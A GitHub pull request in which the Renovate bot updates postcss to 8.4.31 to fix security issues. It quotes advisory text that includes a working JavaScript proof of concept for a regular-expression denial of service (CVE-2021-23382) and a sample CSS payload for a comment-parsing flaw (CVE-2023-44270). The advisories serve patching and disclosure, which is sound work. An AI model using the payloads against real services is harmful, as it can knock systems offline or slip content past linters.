Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

chore(deps): update dependency postcss to v8.4.31 [security] #1266

Open
wants to merge 1 commit into
base: next
Choose a base branch
from
Open

chore(deps): update dependency postcss to v8.4.31 [security] #1266

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Jul 9, 2024
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
postcss (source) 8.4.21 -> 8.4.31 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2021-23382

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern

\/\*\s* sourceMappingURL=(.*)

PoC

var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}

CVE-2023-44270

An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.

This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.

Release Notes

postcss/postcss (postcss)

v8.4.31

Compare Source

v8.4.30

Compare Source

  • Improved source map performance (by Romain Menke).

v8.4.29

Compare Source

  • Fixed Node#source.offset (by Ido Rosenthal).
  • Fixed docs (by Christian Oliff).

v8.4.28

Compare Source

  • Fixed Root.source.end for better source map (by Romain Menke).
  • Fixed Result.root types when process() has no parser.

v8.4.27

Compare Source

  • Fixed Container clone methods types.

v8.4.26

Compare Source

  • Fixed clone methods types.

v8.4.25

Compare Source

v8.4.24

Compare Source

  • Fixed Plugin types.

v8.4.23

Compare Source

  • Fixed warnings in TypeDoc.

v8.4.22

Compare Source

  • Fixed TypeScript support with node16 (by Remco Haszing).

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate Renovate
Copy link
Contributor Author

renovate bot commented Jul 9, 2024

Branch automerge failure

This PR was configured for branch automerge. However, this is not possible, so it has been raised as a PR instead.

@renovate renovate bot enabled auto-merge (rebase) July 9, 2024 08:50
@codesandbox-ci CodeSandbox CI
Copy link

codesandbox-ci bot commented Jul 9, 2024
edited
Loading

This pull request is automatically built and testable in CodeSandbox.

To see build info of the built libraries, click here or the icon next to each commit SHA.

Latest deployment of this branch, based on commit 72816c4:

Sandbox Source
@algolia/autocomplete-example-github-repositories-custom-plugin Configuration
@algolia/autocomplete-example-instantsearch Configuration
@algolia/autocomplete-example-playground Configuration
@algolia/autocomplete-example-preview-panel-in-modal Configuration
@algolia/autocomplete-example-starter-algolia Configuration
@algolia/autocomplete-example-starter Configuration
@algolia/autocomplete-example-reshape Configuration
@algolia/autocomplete-example-vue Configuration

@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from d350c3b to ef6cc4d Compare July 10, 2024 08:11
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from ef6cc4d to 45c9656 Compare July 11, 2024 08:32
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 4 times, most recently from e833617 to d1f66a7 Compare October 16, 2024 08:33
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from 0a0a24a to 1d3c6b6 Compare November 5, 2024 15:00
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from 1d3c6b6 to 72816c4 Compare November 15, 2024 05:21
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants